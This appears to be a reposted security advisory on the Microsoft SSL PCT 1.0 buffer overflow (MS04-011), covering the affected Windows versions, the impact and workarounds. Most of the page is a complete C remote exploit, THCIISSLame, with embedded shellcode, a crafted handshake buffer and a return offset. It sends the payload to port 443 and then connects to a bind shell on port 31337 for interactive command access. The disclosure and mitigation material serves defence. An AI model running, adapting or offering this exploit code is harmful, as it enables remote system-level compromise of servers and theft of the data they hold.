|
Brought to you by:
Suppliers of:
|
|
|
| |
| ISS X-Force has discovered a remotely exploitable buffer overflow condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an encryption technology commonly used to secure Web and email communications. A buffer overflow condition occurs when processing PCT 1.0 handshake packets that can lead to remote, privileged compromise of affected Windows installations. |
| |
Credit:
The information has been provided by Mark Dowd and Neel Mehta of the ISS X-Force.
The exploit has been provided by: johnny cyberpunk of THC
|
| |
Affected Versions:
* Microsoft Windows 2000 up to and including SP4
* Microsoft Windows NT version 4 up to and including SP6a
* Microsoft Windows XP up to SP1
Note: The SSL library included in Windows Server 2003 contains the vulnerability. However, the PCT 1.0 protocol is disabled by default.
Impact:
If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0 protocols are enabled, remote attackers may exploit the buffer overflow condition to execute arbitrary code on vulnerable Windows server installations. This code would run with local system privileges. The protocols necessary for remote exploitation are enabled by default in Windows 2000 and Windows NT version 4.
Common vectors for exploitation might include Internet Information Server (IIS), Exchange Server, Active Directory, and potentially any software making use of the Microsoft SSL library including unlisted third-party software.
The severity of this vulnerability is compounded by the fact that SSL is most often used to secure communications involving confidential or valuable financial information, and that Firewalls and packet filtering alone will not be able to stop attacks. X-Force believes that hackers will aggressively target this vulnerability given the high-value nature of Web sites protected by SSL.
Solution:
The PCT 1.0 protocol is a legacy protocol that is not required for secure SSL communication. The PCT 1.0 protocol can be safely disabled as a workaround for the vulnerability described in this advisory. However, systems using Microsoft Message Queue or MSMQ cannot disable PCT 1.0 without impacting MSMQ. In this circumstance, SSL 2.0 can be safely disabled to close the vulnerability. Successful exploitation of the vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.
Customers are encouraged to immediately evaluate the two scenarios described above and select a workaround that best applies to their environment.
Microsoft has published a Knowledge Base article (187498) that describes how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL 3.0. Microsoft Knowledge Base article 187498 is available at the following address:
http://support.microsoft.com/support/kb/articles/q187/4/98.asp
Additional Information:
Microsoft Security Bulletin MS04-011: http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Exploit:
/*****************************************************************************/
/* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
char shellcode[] =
"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";
void usage();
void shell(int sock);
int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,addr,rc;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;
printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
if(argc<2 || argc>2)
usage();
badbuf = malloc(347);
memset(badbuf,0,347);
printf("\n[*] building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper);
strcat(p,greetings_to_microsoft);
offset^=XOR;
strncat(p,(unsigned char *)&offset,4);
strcat(p,shellcode);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(443);
printf("[*] connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,346,0);
printf("[*] Exploit send successfully ! Sleeping a while ....\n");
Sleep(1000);
}
else
printf("\nCan't connect to ssl port 443!\n");
if(rc==0)
{
printf("[*] Trying to get a shell\n\n");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337 ;( maybe firewalled ...\n");
exit(-1);
}
shell(sock2);
}
shutdown(sock,1);
closesocket(sock);
free(badbuf);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <Host>\n");
printf("Sample: THCIISSLame 31.33.7.23\n\n");
exit(0);
}
void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}
|
|
|
|
|
